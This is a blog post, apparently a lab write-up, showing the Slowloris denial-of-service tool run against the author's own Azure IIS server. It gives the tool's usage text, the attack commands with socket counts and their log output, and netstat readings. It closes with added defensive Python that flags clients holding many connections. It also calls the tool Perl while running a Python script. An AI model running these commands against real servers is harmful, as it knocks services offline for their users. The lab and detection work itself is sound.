SLOWLORIS

alixan
Jan 31, 2022

alixansec

In this post we will briefly talk about the slowloris DoS/DDoS attack tool: how it is used, what it does, and whether it is a successful tool.
Slowloris continuously opens connections to the server on port 80. By immediately opening a new connection in place of each timed-out one, the connection count can reach 1000 within roughly 30–45 seconds. This is quite a powerful attack. Some time after the attack starts, the server reaches its maximum connection count and can no longer open new connections, so the page cannot be served and the service is interrupted, even if only for a short time.

Programming language: Perl

In MITRE ATT&CK terms: Impact (TA0040)

> Network Denial of Service (T1498), Endpoint Denial of Service (T1499)

NOTE! The lab environment belongs to me personally; using this exercise in unauthorized environments is illegal.

alixansec@Kali:~/slowloris$ python3 slowloris.py -h
usage: slowloris.py [-h] [-p PORT] [-s SOCKETS] [-v] [-ua] [-x] [--proxy-host PROXY_HOST] [--proxy-port PROXY_PORT] [--https] [--sleeptime SLEEPTIME] [host]

Slowloris, low bandwidth stress test tool for websites

positional arguments:
  host                  Host to perform stress test on

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  Port of webserver, usually 80
  -s SOCKETS, --sockets SOCKETS
                        Number of sockets to use in the test
  -v, --verbose         Increases logging
  -ua, --randuseragents
                        Randomizes user-agents with each request
  -x, --useproxy        Use a SOCKS5 proxy for connecting
  --proxy-host PROXY_HOST
                        SOCKS5 proxy host
  --proxy-port PROXY_PORT
                        SOCKS5 proxy port
  --https               Use HTTPS for the requests
  --sleeptime SLEEPTIME
                        Time to sleep between each header sent

Let's attack :)

I set up Kali and Windows Server in Azure, installed IIS on the Windows server, and exposed it publicly.

PS C:\Users\alixansec> ipconfig

Windows IP Configuration

IPv4 Address. . . . . . . . . . . : 10.0.0.4

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 10.0.0.1

Public IP : 52.234.217.87

Kali IP Configuration

IPv4 Address. . . . . . . . . . . : 10.0.0.5

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 10.0.0.1

PS C:\Users\alixansec> netstat -aon | findstr :80
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 10.0.0.4:49717 168.63.129.16:80 ESTABLISHED 3952
TCP 10.0.0.4:50241 168.63.129.16:80 ESTABLISHED 2056
TCP 10.0.0.4:50245 168.63.129.16:80 TIME_WAIT 0
TCP [::]:80 [::]:0 LISTENING 4
alixansec@Kali:~/slowloris$ python3 slowloris.py 52.234.217.87
[31-01-2022 15:58:03] Attacking 52.234.217.87 with 150 sockets.
[31-01-2022 15:58:03] Creating sockets...
[31-01-2022 15:58:03] Sending keep-alive headers... Socket count: 150
[31-01-2022 15:58:18] Sending keep-alive headers... Socket count: 150
[31-01-2022 15:58:33] Sending keep-alive headers... Socket count: 150
[31-01-2022 15:58:36] Stopping Slowloris
PS C:\Users\alixansec> netstat -aon | findstr :80
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 10.0.0.4:80 52.191.7.178:45420 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45424 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45428 ESTABLISHED 4
TCP 10.0.0.4:49717 168.63.129.16:80 ESTABLISHED 3952
TCP 10.0.0.4:50241 168.63.129.16:80 ESTABLISHED 2056
TCP 10.0.0.4:50245 168.63.129.16:80 TIME_WAIT 0
TCP [::]:80 [::]:0 LISTENING 4
PS C:\Users\alixansec>
alixansec@Kali:~/slowloris$ python3 slowloris.py 52.234.217.87 -s 999
[31-01-2022 16:01:05] Attacking 52.234.217.87 with 999 sockets.
[31-01-2022 16:01:05] Creating sockets...
[31-01-2022 16:01:06] Sending keep-alive headers... Socket count: 999
[31-01-2022 16:01:21] Sending keep-alive headers... Socket count: 999
[31-01-2022 16:01:36] Sending keep-alive headers... Socket count: 999
[31-01-2022 16:01:51] Sending keep-alive headers... Socket count: 999
[31-01-2022 16:02:06] Sending keep-alive headers... Socket count: 999
[31-01-2022 16:02:21] Sending keep-alive headers... Socket count: 999
[31-01-2022 16:02:36] Sending keep-alive headers... Socket count: 999
[31-01-2022 16:02:40] Stopping Slowloris
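
A defender-side check for the pattern visible in the netstat output taken during the test, as an added example that is not part of the original post: it counts ESTABLISHED connections to the local port 80 per remote IP and flags sources holding many at once. The sample rows are constructed, 203.0.113.10 and 198.51.100.7 are documentation addresses, and the threshold of 100 is an assumed value to tune per server.

```python
from collections import Counter

def split_endpoint(endpoint):
    """Split 'ip:port' or '[v6]:port' on the last colon."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), port

def parse_netstat(text):
    """Yield (local_ip, local_port, remote_ip, remote_port, state) per TCP row."""
    for line in text.splitlines():
        fields = line.split()
        # TCP rows of `netstat -aon`: proto, local, remote, state, pid
        if len(fields) != 5 or fields[0] != "TCP":
            continue
        lhost, lport = split_endpoint(fields[1])
        rhost, rport = split_endpoint(fields[2])
        yield lhost, lport, rhost, rport, fields[3]

def inbound_per_client(text, port=80):
    """Count ESTABLISHED connections to our listening port, per remote IP."""
    counts = Counter()
    for _lhost, lport, rhost, _rport, state in parse_netstat(text):
        # `findstr :80` also matches outbound rows whose *remote* port is 80
        # (the 168.63.129.16 lines); only the local port marks an inbound client.
        if state == "ESTABLISHED" and lport == str(port):
            counts[rhost] += 1
    return counts

def suspects(text, port=80, threshold=100):
    """Remote IPs holding at least `threshold` concurrent connections (assumed limit)."""
    counts = inbound_per_client(text, port)
    return {ip: n for ip, n in counts.items() if n >= threshold}

def build_sample():
    """Constructed netstat rows: one ordinary client plus one source with 150 sockets."""
    rows = [
        "  TCP    0.0.0.0:80        0.0.0.0:0            LISTENING     4",
        "  TCP    10.0.0.4:49717    168.63.129.16:80     ESTABLISHED   3952",
        "  TCP    10.0.0.4:80       198.51.100.7:51514   ESTABLISHED   4",
        "  TCP    [::]:80           [::]:0               LISTENING     4",
    ]
    rows += [f"  TCP    10.0.0.4:80    203.0.113.10:{45420 + 2 * i}    ESTABLISHED    4"
             for i in range(150)]
    return "\n".join(rows)

if __name__ == "__main__":
    sample = build_sample()
    print(inbound_per_client(sample).most_common())
    print(suspects(sample))
```

On the server, the same functions can be fed the saved output of `netstat -aon`.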

Download link for the Wireshark capture file of these packets.